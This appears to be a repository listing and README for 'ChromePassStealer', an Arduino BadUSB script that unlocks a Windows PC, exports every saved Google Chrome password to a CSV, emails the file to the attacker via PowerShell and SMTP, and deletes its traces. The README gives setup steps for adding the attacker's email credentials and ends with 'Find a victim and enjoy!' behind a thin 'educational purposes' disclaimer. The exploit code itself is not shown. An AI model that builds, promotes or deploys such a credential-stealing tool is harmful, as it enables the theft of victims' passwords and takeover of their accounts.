https://github.com/tuconnaisyouknow/chromepassstealer
This script makes your BadUSB steal all the victim's Google Chrome password.
https://github.com/tuconnaisyouknow/chromepassstealer
arduino bad-usb badusb duckyscript dump dumper email gmail google-chrome googlechrome grabber password smtp steal stealer usb-hid
Last synced: 4 months ago
JSON representation
This script makes your BadUSB steal all the victim's Google Chrome password.
- Host: GitHub
- URL: https://github.com/tuconnaisyouknow/chromepassstealer
- Owner: tuconnaisyouknow
- License: mit
- Created: 2022-03-03T23:59:59.000Z (over 3 years ago)
- Default Branch: main
- Last Pushed: 2025-02-08T19:44:20.000Z (9 months ago)
- Last Synced: 2025-04-10T23:51:30.769Z (7 months ago)
- Topics: arduino, bad-usb, badusb, duckyscript, dump, dumper, email, gmail, google-chrome, googlechrome, grabber, password, smtp, steal, stealer, usb-hid
- Language: C++
- Homepage:
- Size: 30.3 KB
- Stars: 28
- Watchers: 2
- Forks: 3
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# đĨˇ ChromePassStealer
đ¨ **This project is no longer updated.** If you want a better script, click [here](https://github.com/tuconnaisyouknow/BadUSB_passStealer).
## â ī¸ Warning
Everything in this repository is **strictly** for educational purposes. **I am not responsible** for any stolen data. **You are responsible** for your actions when using this script with **BadUSB**.
## âšī¸ About
Many people who are not well-informed about **cybersecurity** save their **passwords** in **Google Chrome** for convenience. This script **exploits** this weakness to **steal** all saved passwords.
### đ ī¸ How it works:
1ī¸âŖ **Disables Windows password** using PowerShell.
2ī¸âŖ **Opens Google Chrome** and downloads a **.csv file** containing all saved passwords.
3ī¸âŖ **Sends the file by email** via PowerShell.
4ī¸âŖ **Deletes traces** by removing the file and closing Chrome.
## đ Key Information for Users
### đš Important Note #1 â Keyboard Layout Adaptation
Sometimes, you might see this in the code:
```arduino
Keyboard.press(KEY_LEFT_CTRL);
Keyboard.press(KEY_LEFT_ALT);
Keyboard.press(173);
Keyboard.releaseAll();
```
This is used to type characters like `@` or `\`, but it depends on the **keyboard layout**. đ **Adapt these characters** using this [ASCII table](https://www.csee.umbc.edu/portal/help/theory/ascii.txt) or simply **switch the keyboard layout to French**.
### đ Important Note #2 â Visibility Issue
â ī¸ The script **is not yet optimized** for stealth. The victim **can see** their computer acting on its own.
### đ Important Note #3 â Adjusting Delay
You can **customize the delay** based on how fast you plug in the **BadUSB**.
## đ Getting Started
## đ Requirements
âī¸ A **BadUSB**
âī¸ Install **Arduino software** [here](https://www.arduino.cc/en/software)
âī¸ A **Gmail** account with **"Less Secure Apps"** enabled [here](https://www.google.com/settings/security/lesssecureapps) *(if required)*
## âī¸ Installation
1ī¸âŖ **Download this repository**
đš **Linux:**
```bash
git clone https://github.com/tuconnaisyouknow/ChromePassStealer
cd ChromePassStealer
```
đš **Windows:**
- Click the **green "Code" button** at the top right.
- Click **"Download ZIP"** and extract it.
2ī¸âŖ **Replace your email and password** in:
- [`ChromePassStealer.ino`](https://github.com/tuconnaisyouknow/ChromePassStealer/blob/main/ChromePassStealer.ino)
*(Lines 238, 245, 253, 264)*
3ī¸âŖ **Upload the script to your BadUSB** using **Arduino software**.
4ī¸âŖ **Find a victim and enjoy!** đ
## đĨī¸ Requirements for the Victim's PC
âī¸ **Turn off Caps Lock**
âī¸ **Switch the keyboard layout to French** *(or adapt the code accordingly)*
## đ Help Me âī¸
I want to **make the script run in the background** and perform all actions from **Chrome directly via PowerShell**. If you have any ideas, feel free to contribute! đ